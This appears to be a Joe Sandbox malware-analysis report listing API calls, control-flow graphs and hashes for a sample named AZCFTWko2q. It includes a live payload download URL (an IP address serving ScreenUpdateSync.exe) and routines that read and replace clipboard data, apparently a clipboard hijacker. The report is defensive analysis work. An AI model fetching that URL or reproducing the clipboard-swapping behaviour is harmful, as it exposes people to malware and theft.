                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1198197534-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                                      • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3873111417-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                                                      • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                                      • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                                      • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2843524283-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                                      • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                                      APIs
• SetErrorMode.KERNEL32(00000400,?,?,024C0223,?,?), ref: 024C0E19
• SetErrorMode.KERNEL32(00000000,?,?,024C0223,?,?), ref: 024C0E1E
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 19e3bb3d86d1ccb7e2d50aa8a73f4fa727658f1bcbf078656ba80fd3e822a18e
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 82D01235145128B7D7403A94DC09BDE7B1CDF05B66F108011FB0DD9180C770954046E5

Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
• Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
• Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
• Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
• Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
• Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
• Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

APIs
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Ios_base_dtorstd::ios_base::_
• String ID:
• API String ID: 323602529-0
• Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
• Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
• Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
• Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID:
• API String ID: 3886170330-0
• Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
• Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
• Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
• Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
• Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
• Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
• Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
• Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
• Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

APIs
• RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
• Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
• Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A39CEE
Memory Dump Source
• Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 024C194D
• Sleep.KERNEL32(00001541), ref: 024C1957
  • Part of subcall function 024CCE77: _strlen.LIBCMT ref: 024CCE8E
• OpenClipboard.USER32(00000000), ref: 024C1984
• GetClipboardData.USER32(00000001), ref: 024C1994
• _strlen.LIBCMT ref: 024C19B0
• _strlen.LIBCMT ref: 024C19DF
• _strlen.LIBCMT ref: 024C1B23
• EmptyClipboard.USER32 ref: 024C1B39
• GlobalAlloc.KERNEL32(00000002,00000001), ref: 024C1B46
• GlobalUnlock.KERNEL32(00000000), ref: 024C1B70
• SetClipboardData.USER32(00000001,00000000), ref: 024C1B79
• GlobalFree.KERNEL32(00000000), ref: 024C1B80
• CloseClipboard.USER32 ref: 024C1BA4
• Sleep.KERNEL32(000002D2), ref: 024C1BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: 4#E$i
• API String ID: 4246938166-2480119546
APIs
• NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024C239C
• GetClientRect.USER32(?,?), ref: 024C23B1
• GetDC.USER32(?), ref: 024C23B8
• CreateSolidBrush.GDI32(00646464), ref: 024C23CB
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024C23EA
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024C240B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 024C2416
• MulDiv.KERNEL32(00000008,00000000), ref: 024C241F
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024C2443
• SetBkMode.GDI32(?,00000001), ref: 024C24CE
• _wcslen.LIBCMT ref: 024C24E6
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
• String ID:
• API String ID: 1529870607-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                      • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                                      • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA6E
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA97
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,024FBCF4,?,00000000), ref: 024FBAAC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction ID: 288a1f027990ebf76b0392541bbb88d75f7ef192e0cdbe7723b3037dddc8a195
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C219532E00304AAE7749F54D901BA772A6EBCAE1CB56C066EA0AD7204F732DA81C350
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024FBCB5
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 024FBD10
                                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 024FBD1F
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,024F0A1C,00000040,?,024F0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024FBD67
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,024F0A9C,00000040), ref: 024FBD86
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                                      • Instruction ID: 7f37e6073a518e84179c4c1334e59d9c16c6f8ab6b38ff6aa6a1b7232299f209
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE519371900249ABEB51DFA5CC44ABF77B9EF9E708F04042FEA00E7290EB7196458B61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2287132625-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID: C$C
• API String ID: 0-238425240
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024F0A23,?,?,?,?,024F047A,?,00000004), ref: 024FB353
• _wcschr.LIBVCRUNTIME ref: 024FB3E3
• _wcschr.LIBVCRUNTIME ref: 024FB3F1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024F0A23,00000000,024F0B43), ref: 024FB494
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
• _wcschr.LIBVCRUNTIME ref: 0043B17C
• _wcschr.LIBVCRUNTIME ref: 0043B18A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
